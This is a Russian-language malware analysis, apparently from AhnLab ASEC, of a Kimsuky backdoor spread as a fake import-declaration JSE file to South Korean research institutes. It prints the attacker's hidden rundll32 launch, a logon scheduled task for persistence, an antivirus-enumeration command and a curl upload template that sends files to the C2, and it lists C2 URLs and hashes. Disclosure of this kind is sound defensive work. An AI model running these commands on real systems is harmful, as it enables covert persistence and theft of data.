Центр экстренного реагирования на чрезвычайные ситуации AhnLab Security (ASEC) недавно обнаружил, что группа угроз Kimsuky распространяет вредоносный файл JSE, замаскированный под импортную декларацию, среди исследовательских институтов в Южной Корее. Атакующий использует бэкдор для кражи информации и выполнения команд.
Имя файла дроппера, замаскированного под импортную декларацию, выглядит следующим образом: Import Declaration_Official Stamp Affixed.jse
Файл содержит обфусцированный сценарий PowerShell, файл бэкдора в Base64-кодировке и легитимный PDF-файл.
Легитимный PDF-файл сохраняется под именем 'Import Declaration.PDF' и автоматически выполняется сценарием PowerShell. Этот файл содержит информацию о цели атаки. Создание и выполнение легитимного PDF-файла, вероятно, делается для того, чтобы пользователи не смогли распознать, что в процессе выполняется вредоносный файл с бэкдором.
В фоновом режиме по пути %ProgramData% создается бэкдор под именем файла 'vuVvMKg.i3IO', а вредоносная программа запускается с помощью файла rundll32.exe.
1 | powershell.exe -windowstyle hidden rundll32.exe ProgramData\\\vuVuVuMKg.i3IO UpdateSystem |
Перед регистрацией в планировщике задач вредоносная программа копирует себя в пути %ProgramData% и %Public% под именем файла 'IconCache.db' для сохранения.
1 | cmd.exe /c schtasks /create /tn iconcache /tr "rundll32.exe C:\Programdata\IconCache.db UpdateSystem /sc onlogon /rl highest /f |
Для получения системной информации бэкдор использует команду wmic для проверки состояния антивирусной защиты объекта атаки и собирает сетевую информацию с помощью команды ipconfig.
1 2 | cmd.exe /U /c wimc /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt ipconfig /all |
После этого собирается такая информация, как имя хоста, имя пользователя и данные об ОС. Чтобы избежать обнаружения, вредоносная программа кодирует результаты выполнения команд и отправляет их на C2.
Также выполняются следующие команды (включая утечку системной информации), которые ведут себя как бэкдор в пораженной системе. Кроме того, для загрузки информации на сервер C2 используется инструмент curl.
- getinfo: Системная информация
- die: Завершить .
- where: Путь выполнения
- run: Запуск определенных файлов и команд
- curl -k -F "fileToUpload=@%s" -F "id=%S" %s
Поскольку файл-приманка также запускается, пользователи не могут распознать, что их системы заражены вредоносным ПО. Поскольку эти типы вредоносных программ в основном атакуют конкретные цели, пользователям следует воздержаться от запуска вложений в письмах, отправленных из неизвестных источников.
Indicators of Compromise
URLs
- http://rscnode.dothome.co.kr/index.php
- http://rscnode.dothome.co.kr/upload.php
MD5
- d2335df6d17fc7c2a5d0583423e39ff8
- d6abeeb469e2417bbcd3c122c06ba099